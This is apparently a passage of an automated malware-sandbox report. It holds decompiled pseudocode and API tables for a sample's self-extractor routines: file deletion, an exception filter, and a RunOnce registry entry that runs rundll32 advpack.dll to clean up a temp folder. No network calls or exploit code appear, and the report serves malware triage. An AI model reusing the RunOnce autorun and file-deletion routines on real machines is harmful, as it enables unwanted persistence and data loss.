                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,001A11F8), ref: 001A2427
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,001A11FC), ref: 001A243B
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 001A2495
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 001A24A3
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001A24AF
                                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 001A24BE
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(001A8A3A), ref: 001A24C5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836429354-0
                                                                                                                                                                                                                                              • Opcode ID: c01f09d6b59f4a0a46c0b64e7c648abff15ba98d75e3776a936a2c0b4ad33118
                                                                                                                                                                                                                                              • Instruction ID: e54a5aaba29082953ff6bfe68a0ef9c56a922dbec9335e562fab50b795568f54
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c01f09d6b59f4a0a46c0b64e7c648abff15ba98d75e3776a936a2c0b4ad33118
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6531B535604740ABC321DB68CD89AEB73ECAFDB315F04492DF559C2190EB74994DC752
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                                                                                                              			E001A2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t7;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				signed char _t19;
                                                                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t4 = GetVersion();
                                                                                                                                                                                                                                              				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                              					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t17 = _t21;
                                                                                                                                                                                                                                              							 *0x1aa288(0, 1, 0, 0);
                                                                                                                                                                                                                                              							 *_t21();
                                                                                                                                                                                                                                              							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                              							if(_t24 != _t24) {
                                                                                                                                                                                                                                              								_t17 = 4;
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t20 = _a12;
                                                                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                                                                              				 *0x1a9124 = 0;
                                                                                                                                                                                                                                              				if(E001A2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                              					_t9 = E001A2F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                              					_t22 = _t9; // executed
                                                                                                                                                                                                                                              					E001A52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                              					if(_t22 != 0) {
                                                                                                                                                                                                                                              						_t32 =  *0x1a8a3a; // 0x0
                                                                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                                                                              							_t19 =  *0x1a9a2c; // 0x0
                                                                                                                                                                                                                                              							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              								E001A1F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t6 =  *0x1a8588; // 0x0
                                                                                                                                                                                                                                              				if(_t6 != 0) {
                                                                                                                                                                                                                                              					CloseHandle(_t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 =  *0x1a9124; // 0x80070002
                                                                                                                                                                                                                                              				return _t7;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x001a2c03
                                                                                                                                                                                                                                              0x001a2c0d
                                                                                                                                                                                                                                              0x001a2c18
                                                                                                                                                                                                                                              0x001a2c20
                                                                                                                                                                                                                                              0x001a2c2e
                                                                                                                                                                                                                                              0x001a2c32
                                                                                                                                                                                                                                              0x001a2c36
                                                                                                                                                                                                                                              0x001a2c3d
                                                                                                                                                                                                                                              0x001a2c43
                                                                                                                                                                                                                                              0x001a2c45
                                                                                                                                                                                                                                              0x001a2c47
                                                                                                                                                                                                                                              0x001a2c49
                                                                                                                                                                                                                                              0x001a2c4e
                                                                                                                                                                                                                                              0x001a2c4e
                                                                                                                                                                                                                                              0x001a2c47
                                                                                                                                                                                                                                              0x001a2c32
                                                                                                                                                                                                                                              0x001a2c20
                                                                                                                                                                                                                                              0x001a2c50
                                                                                                                                                                                                                                              0x001a2c54
                                                                                                                                                                                                                                              0x001a2c57
                                                                                                                                                                                                                                              0x001a2c64
                                                                                                                                                                                                                                              0x001a2c66
                                                                                                                                                                                                                                              0x001a2c6b
                                                                                                                                                                                                                                              0x001a2c6d
                                                                                                                                                                                                                                              0x001a2c74
                                                                                                                                                                                                                                              0x001a2c76
                                                                                                                                                                                                                                              0x001a2c7c
                                                                                                                                                                                                                                              0x001a2c7e
                                                                                                                                                                                                                                              0x001a2c87
                                                                                                                                                                                                                                              0x001a2c89
                                                                                                                                                                                                                                              0x001a2c89
                                                                                                                                                                                                                                              0x001a2c87
                                                                                                                                                                                                                                              0x001a2c7c
                                                                                                                                                                                                                                              0x001a2c74
                                                                                                                                                                                                                                              0x001a2c8e
                                                                                                                                                                                                                                              0x001a2c95
                                                                                                                                                                                                                                              0x001a2c98
                                                                                                                                                                                                                                              0x001a2c98
                                                                                                                                                                                                                                              0x001a2c9e
                                                                                                                                                                                                                                              0x001a2ca7

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersion.KERNEL32(?,00000002,00000000,?,001A6BB0,001A0000,00000000,00000002,0000000A), ref: 001A2C03
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32.dll,?,001A6BB0,001A0000,00000000,00000002,0000000A), ref: 001A2C18
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 001A2C28
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,001A6BB0,001A0000,00000000,00000002,0000000A), ref: 001A2C98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                              • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                              • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                              • Opcode ID: fd42907a394cb61605391a93a615758ef2b589d4565ef96bf7c4fa89e6cd1e6d
                                                                                                                                                                                                                                              • Instruction ID: c20d334468c55201108940e08081fa048fcdc33ac5d79ce2cdd5234edb8b08b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd42907a394cb61605391a93a615758ef2b589d4565ef96bf7c4fa89e6cd1e6d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4411E179340305BBD7216BBCAD88B6F37699F8B7B0B050026F900D3A59DB70DC81C661
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A6F40() {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(E001A6EF0); // executed
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x001a6f45
                                                                                                                                                                                                                                              0x001a6f4d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 001A6F45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: 6837eb8980aec8d9befb89ec3361d6aa07623aff27531f58772806ac33e2e268
                                                                                                                                                                                                                                              • Instruction ID: 2fc5b61e5d7c9a3cfd3ebc040b55f70721d4ff6c211f42b3417e1e9803af864a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6837eb8980aec8d9befb89ec3361d6aa07623aff27531f58772806ac33e2e268
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2190026825110057D6115B709D1941579915F4F602BC55460A021C4894DB6044819912
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				void* _v532;
                                                                                                                                                                                                                                              				int _v536;
                                                                                                                                                                                                                                              				int _v540;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				void _t56;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t72;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				intOrPtr* _t81;
                                                                                                                                                                                                                                              				void* _t86;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t90;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t79 = __edx;
                                                                                                                                                                                                                                              				_t28 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                              				_t84 = 0x104;
                                                                                                                                                                                                                                              				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                              				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                                                                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					L24:
                                                                                                                                                                                                                                              					return E001A6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(_t86);
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E001A171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                              					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                              					if(_t41 != 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t87 = _t87 + 1;
                                                                                                                                                                                                                                              					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                              					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                              					_t79 = _t84;
                                                                                                                                                                                                                                              					E001A658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                              					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                              					_t84 = _t46;
                                                                                                                                                                                                                                              					if(_t84 == 0) {
                                                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0x1a9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              							L17:
                                                                                                                                                                                                                                              							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							_pop(_t86);
                                                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						_t72 =  &_v268;
                                                                                                                                                                                                                                              						_t80 = _t72 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t49 =  *_t72;
                                                                                                                                                                                                                                              							_t72 = _t72 + 1;
                                                                                                                                                                                                                                              						} while (_t49 != 0);
                                                                                                                                                                                                                                              						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                              						_t81 = 0x1a91e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t50 =  *_t81;
                                                                                                                                                                                                                                              							_t81 = _t81 + 1;
                                                                                                                                                                                                                                              						} while (_t50 != 0);
                                                                                                                                                                                                                                              						_t84 = _t73 + 0x50 + _t81 - 0x1a91e5;
                                                                                                                                                                                                                                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1a91e5);
                                                                                                                                                                                                                                              						if(_t90 != 0) {
                                                                                                                                                                                                                                              							 *0x1a8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              							E001A171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                              							_t75 = _t90;
                                                                                                                                                                                                                                              							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                              							_t79 = _t23;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t56 =  *_t75;
                                                                                                                                                                                                                                              								_t75 = _t75 + 1;
                                                                                                                                                                                                                                              							} while (_t56 != 0);
                                                                                                                                                                                                                                              							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                              							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                              							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                              							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t79 = 0x4b5;
                                                                                                                                                                                                                                              						E001A44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                              					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                              					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                              					if(_t91 == 0) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              						E001A658A( &_v268, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              				 *0x1a8530 = _t66;
                                                                                                                                                                                                                                              				goto L23;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x001a202a
                                                                                                                                                                                                                                              0x001a2035
                                                                                                                                                                                                                                              0x001a203c
                                                                                                                                                                                                                                              0x001a2041
                                                                                                                                                                                                                                              0x001a2050
                                                                                                                                                                                                                                              0x001a205f
                                                                                                                                                                                                                                              0x001a2064
                                                                                                                                                                                                                                              0x001a206f
                                                                                                                                                                                                                                              0x001a208c
                                                                                                                                                                                                                                              0x001a2094
                                                                                                                                                                                                                                              0x001a2257
                                                                                                                                                                                                                                              0x001a2266
                                                                                                                                                                                                                                              0x001a2266
                                                                                                                                                                                                                                              0x001a209a
                                                                                                                                                                                                                                              0x001a209b
                                                                                                                                                                                                                                              0x001a209d
                                                                                                                                                                                                                                              0x001a20aa
                                                                                                                                                                                                                                              0x001a20af
                                                                                                                                                                                                                                              0x001a20c9
                                                                                                                                                                                                                                              0x001a20d1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a20d3
                                                                                                                                                                                                                                              0x001a20da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a20da
                                                                                                                                                                                                                                              0x001a20e2
                                                                                                                                                                                                                                              0x001a2103
                                                                                                                                                                                                                                              0x001a210e
                                                                                                                                                                                                                                              0x001a2116
                                                                                                                                                                                                                                              0x001a2122
                                                                                                                                                                                                                                              0x001a2128
                                                                                                                                                                                                                                              0x001a212c
                                                                                                                                                                                                                                              0x001a2179
                                                                                                                                                                                                                                              0x001a2194
                                                                                                                                                                                                                                              0x001a21de
                                                                                                                                                                                                                                              0x001a21e4
                                                                                                                                                                                                                                              0x001a2256
                                                                                                                                                                                                                                              0x001a2256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2256
                                                                                                                                                                                                                                              0x001a2196
                                                                                                                                                                                                                                              0x001a2196
                                                                                                                                                                                                                                              0x001a219c
                                                                                                                                                                                                                                              0x001a219f
                                                                                                                                                                                                                                              0x001a219f
                                                                                                                                                                                                                                              0x001a21a1
                                                                                                                                                                                                                                              0x001a21a2
                                                                                                                                                                                                                                              0x001a21a6
                                                                                                                                                                                                                                              0x001a21a8
                                                                                                                                                                                                                                              0x001a21b0
                                                                                                                                                                                                                                              0x001a21b0
                                                                                                                                                                                                                                              0x001a21b2
                                                                                                                                                                                                                                              0x001a21b3
                                                                                                                                                                                                                                              0x001a21bc
                                                                                                                                                                                                                                              0x001a21c7
                                                                                                                                                                                                                                              0x001a21cb
                                                                                                                                                                                                                                              0x001a21f1
                                                                                                                                                                                                                                              0x001a21f6
                                                                                                                                                                                                                                              0x001a21fd
                                                                                                                                                                                                                                              0x001a21ff
                                                                                                                                                                                                                                              0x001a21ff
                                                                                                                                                                                                                                              0x001a2204
                                                                                                                                                                                                                                              0x001a2213
                                                                                                                                                                                                                                              0x001a2218
                                                                                                                                                                                                                                              0x001a221d
                                                                                                                                                                                                                                              0x001a221d
                                                                                                                                                                                                                                              0x001a2220
                                                                                                                                                                                                                                              0x001a2220
                                                                                                                                                                                                                                              0x001a2222
                                                                                                                                                                                                                                              0x001a2223
                                                                                                                                                                                                                                              0x001a2229
                                                                                                                                                                                                                                              0x001a223d
                                                                                                                                                                                                                                              0x001a2249
                                                                                                                                                                                                                                              0x001a2250
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2250
                                                                                                                                                                                                                                              0x001a21d2
                                                                                                                                                                                                                                              0x001a21d9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a21d9
                                                                                                                                                                                                                                              0x001a213a
                                                                                                                                                                                                                                              0x001a2141
                                                                                                                                                                                                                                              0x001a2144
                                                                                                                                                                                                                                              0x001a214c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2163
                                                                                                                                                                                                                                              0x001a2172
                                                                                                                                                                                                                                              0x001a2172
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2163
                                                                                                                                                                                                                                              0x001a20ea
                                                                                                                                                                                                                                              0x001a20f0
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A2050
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A205F
                                                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 001A208C
                                                                                                                                                                                                                                                • Part of subcall function 001A171E: _vsnprintf.MSVCRT ref: 001A1750
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A20C9
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A20EA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 001A2103
                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A2122
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 001A2134
                                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A2144
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 001A215B
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A218C
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A21C1
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A21E4
                                                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 001A223D
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A2249
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001A2250
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                              • API String ID: 178549006-217856272
                                                                                                                                                                                                                                              • Opcode ID: bee39b66740b7c05e3d23dd277f7a8781bd7787fdcb0737a44b4924d39770b04
                                                                                                                                                                                                                                              • Instruction ID: 66c06bc58801f5c8d1b8ec5c1172a7ef5e28e4baafe45bcd1b56dc4953a403aa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bee39b66740b7c05e3d23dd277f7a8781bd7787fdcb0737a44b4924d39770b04
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7551F579A00214ABDB209B64DD49FFB7B7CEF57700F0001A5FA45E7151EB719E89CA60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
